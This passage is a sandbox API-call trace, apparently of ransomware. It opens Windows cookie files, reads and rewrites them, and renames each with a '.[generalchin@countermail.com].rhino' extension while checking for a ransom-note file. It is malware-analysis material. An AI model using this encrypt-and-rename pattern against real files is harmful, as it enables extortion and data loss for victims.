lpBuffer=0x23b0620*, lpNumberOfBytesWritten=0x2cfa04*=0x234, lpOverlapped=0x0) returned 1 [0088.842] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0620 | out: hHeap=0x6d0000) returned 1 [0088.842] UnlockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x234, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0088.842] CloseHandle (hObject=0x104) returned 1 [0088.843] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0) returned 0x77f4a0 [0088.843] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x14e) returned 0x23b03f8 [0088.843] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77f4a0 | out: hHeap=0x6d0000) returned 1 [0088.843] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@google[2].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\5p5nrgjn0js_halpmcxz@google[2].txt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@google[2].txt.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\5p5nrgjn0js_halpmcxz@google[2].txt.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0088.845] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b03f8 | out: hHeap=0x6d0000) returned 1 [0088.845] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0270 | out: hHeap=0x6d0000) returned 1 [0088.845] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0048 | out: hHeap=0x6d0000) returned 1 [0088.845] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x90) returned 0x23b0048 [0088.845] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0088.845] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x90) returned 0x72a920 [0088.845] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd6) returned 0x23b00e0 [0088.845] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0088.845] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0088.846] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b00e0 | out: hHeap=0x6d0000) returned 1 [0088.846] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@ml314[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\5p5nrgjn0js_halpmcxz@ml314[1].txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0088.846] GetFileSize (in: hFile=0x104, lpFileSizeHigh=0x2cfa64 | out: lpFileSizeHigh=0x2cfa64*=0x0) returned 0x56 [0088.846] LockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x176, nNumberOfBytesToLockHigh=0x0) returned 1 [0088.846] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.847] ReadFile (in: hFile=0x104, lpBuffer=0x2cfa24, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x2cfa24*, lpNumberOfBytesRead=0x2cfa04*=0x20, lpOverlapped=0x0) returned 1 [0088.848] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.849] ReadFile (in: hFile=0x104, lpBuffer=0x9b0040, nNumberOfBytesToRead=0x56, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x9b0040*, lpNumberOfBytesRead=0x2cfa04*=0x56, lpOverlapped=0x0) returned 1 [0088.849] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b7f8 [0088.849] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0088.849] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x72aff8 [0088.849] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7438 [0088.849] GetLastError () returned 0x0 [0088.849] SetLastError (dwErrCode=0x0) [0088.849] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0088.849] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x56) returned 0x708d18 [0088.849] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0088.849] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x23b00e0 [0088.849] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x23b01e8 [0088.850] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b00e0 | out: hHeap=0x6d0000) returned 1 [0088.850] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.850] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72b7f8 [0088.850] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b828 [0088.850] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0088.850] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x72b7f8 [0088.850] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b828 | out: hHeap=0x6d0000) returned 1 [0088.850] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b828 [0088.850] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0088.850] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x72b7f8 [0088.850] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b828 | out: hHeap=0x6d0000) returned 1 [0088.850] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x6df110 [0088.850] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0088.850] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x6df140 [0088.850] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df110 | out: hHeap=0x6d0000) returned 1 [0088.850] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709e68 [0088.850] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df140 | out: hHeap=0x6d0000) returned 1 [0088.850] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6e8980 [0088.850] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709e68 | out: hHeap=0x6d0000) returned 1 [0088.850] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x72aff8 [0088.850] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8980 | out: hHeap=0x6d0000) returned 1 [0088.851] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e7438 [0088.851] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0088.851] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x72a920 [0088.851] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0088.851] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x176) returned 0x23b0370 [0088.851] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0088.851] WriteFile (in: hFile=0x104, lpBuffer=0x23b0370*, nNumberOfBytesToWrite=0x176, lpNumberOfBytesWritten=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x23b0370*, lpNumberOfBytesWritten=0x2cfa04*=0x176, lpOverlapped=0x0) returned 1 [0088.851] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0370 | out: hHeap=0x6d0000) returned 1 [0088.851] UnlockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x176, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0088.851] CloseHandle (hObject=0x104) returned 1 [0088.852] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0) returned 0x77f4a0 [0088.852] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x14e) returned 0x23b0370 [0088.852] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77f4a0 | out: hHeap=0x6d0000) returned 1 [0088.852] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@ml314[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\5p5nrgjn0js_halpmcxz@ml314[1].txt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@ml314[1].txt.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\5p5nrgjn0js_halpmcxz@ml314[1].txt.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0088.854] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0370 | out: hHeap=0x6d0000) returned 1 [0088.854] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b01e8 | out: hHeap=0x6d0000) returned 1 [0088.854] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0088.854] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x90) returned 0x72a920 [0088.854] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0048 | out: hHeap=0x6d0000) returned 1 [0088.854] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x90) returned 0x23b0048 [0088.854] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd6) returned 0x23b00e0 [0088.854] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0048 | out: hHeap=0x6d0000) returned 1 [0088.854] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0088.854] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b00e0 | out: hHeap=0x6d0000) returned 1 [0088.854] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@rlcdn[2].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\5p5nrgjn0js_halpmcxz@rlcdn[2].txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0088.870] GetFileSize (in: hFile=0x104, lpFileSizeHigh=0x2cfa64 | out: lpFileSizeHigh=0x2cfa64*=0x0) returned 0x19e [0088.870] LockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x2be, nNumberOfBytesToLockHigh=0x0) returned 1 [0088.871] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.871] ReadFile (in: hFile=0x104, lpBuffer=0x2cfa24, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x2cfa24*, lpNumberOfBytesRead=0x2cfa04*=0x20, lpOverlapped=0x0) returned 1 [0088.872] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.873] ReadFile (in: hFile=0x104, lpBuffer=0x9b0040, nNumberOfBytesToRead=0x19e, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x9b0040*, lpNumberOfBytesRead=0x2cfa04*=0x19e, lpOverlapped=0x0) returned 1 [0088.873] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b7f8 [0088.873] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0088.873] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x72aff8 [0088.873] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7438 [0088.873] GetLastError () returned 0x0 [0088.873] SetLastError (dwErrCode=0x0) [0088.873] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0088.873] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x19e) returned 0x23b0048 [0088.873] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0088.873] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x23b01f0 [0088.873] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x23b02f8 [0088.873] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b01f0 | out: hHeap=0x6d0000) returned 1 [0088.873] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.873] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72b7f8 [0088.874] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b828 [0088.874] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0088.874] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x72b7f8 [0088.874] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b828 | out: hHeap=0x6d0000) returned 1 [0088.874] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b828 [0088.874] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0088.874] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x72b7f8 [0088.874] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b828 | out: hHeap=0x6d0000) returned 1 [0088.874] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x6df140 [0088.874] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0088.874] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x6df110 [0088.874] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df140 | out: hHeap=0x6d0000) returned 1 [0088.874] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709e68 [0088.874] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df110 | out: hHeap=0x6d0000) returned 1 [0088.874] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6e8980 [0088.874] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709e68 | out: hHeap=0x6d0000) returned 1 [0088.874] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x72aff8 [0088.874] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8980 | out: hHeap=0x6d0000) returned 1 [0088.874] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e7438 [0088.874] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0088.874] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x708d18 [0088.874] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0088.874] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x23b01f0 [0088.874] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0088.875] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x23b0480 [0088.875] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b01f0 | out: hHeap=0x6d0000) returned 1 [0088.875] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x23b0560 [0088.875] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0480 | out: hHeap=0x6d0000) returned 1 [0088.875] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x23b06a8 [0088.875] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0560 | out: hHeap=0x6d0000) returned 1 [0088.875] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x23b0890 [0088.875] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b06a8 | out: hHeap=0x6d0000) returned 1 [0088.875] WriteFile (in: hFile=0x104, lpBuffer=0x23b0890*, nNumberOfBytesToWrite=0x2be, lpNumberOfBytesWritten=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x23b0890*, lpNumberOfBytesWritten=0x2cfa04*=0x2be, lpOverlapped=0x0) returned 1 [0088.875] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0890 | out: hHeap=0x6d0000) returned 1 [0088.875] UnlockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x2be, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0088.875] CloseHandle (hObject=0x104) returned 1 [0088.877] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0) returned 0x77f4a0 [0088.877] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x14e) returned 0x23b0480 [0088.877] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77f4a0 | out: hHeap=0x6d0000) returned 1 [0088.877] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@rlcdn[2].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\5p5nrgjn0js_halpmcxz@rlcdn[2].txt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@rlcdn[2].txt.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\5p5nrgjn0js_halpmcxz@rlcdn[2].txt.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0088.878] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0480 | out: hHeap=0x6d0000) returned 1 [0088.878] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b02f8 | out: hHeap=0x6d0000) returned 1 [0088.878] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0048 | out: hHeap=0x6d0000) returned 1 [0088.878] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x90) returned 0x23b0048 [0088.879] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0088.879] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x90) returned 0x72a920 [0088.879] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd6) returned 0x23b00e0 [0088.879] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0088.879] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0088.879] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b00e0 | out: hHeap=0x6d0000) returned 1 [0088.879] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@ad13.adfarm1.adition[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@ad13.adfarm1.adition[1].txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0088.882] GetFileSize (in: hFile=0x104, lpFileSizeHigh=0x2cfa64 | out: lpFileSizeHigh=0x2cfa64*=0x0) returned 0x66 [0088.882] LockFile (hFile=0x104, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x186, nNumberOfBytesToLockHigh=0x0) returned 1 [0088.882] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.882] ReadFile (in: hFile=0x104, lpBuffer=0x2cfa24, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x2cfa24*, lpNumberOfBytesRead=0x2cfa04*=0x20, lpOverlapped=0x0) returned 1 [0088.884] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.884] ReadFile (in: hFile=0x104, lpBuffer=0x9b0040, nNumberOfBytesToRead=0x66, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x9b0040*, lpNumberOfBytesRead=0x2cfa04*=0x66, lpOverlapped=0x0) returned 1 [0088.884] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b7f8 [0088.884] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0088.884] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x72aff8 [0088.884] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7438 [0088.884] GetLastError () returned 0x0 [0088.884] SetLastError (dwErrCode=0x0) [0088.885] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0088.885] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x66) returned 0x72a920 [0088.885] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0088.885] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x23b00e0 [0088.885] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x23b01e8 [0088.885] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b00e0 | out: hHeap=0x6d0000) returned 1 [0088.885] SetFilePointerEx (in: hFile=0x104, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.885] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72b7f8 [0088.885] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b828 [0088.885] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0088.885] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x72b7f8 [0088.885] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b828 | out: hHeap=0x6d0000) returned 1 [0088.885] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b828 [0088.885] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0088.885] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x72b7f8 [0088.885] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b828 | out: hHeap=0x6d0000) returned 1 [0088.885] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x6df110 [0088.885] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0088.885] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x6df140 [0088.885] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df110 | out: hHeap=0x6d0000) returned 1 [0088.886] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709e68 [0088.886] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df140 | out: hHeap=0x6d0000) returned 1 [0088.886] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6e8980 [0088.886] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709e68 | out: hHeap=0x6d0000) returned 1 [0088.886] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x72aff8 [0088.886] HeapFree 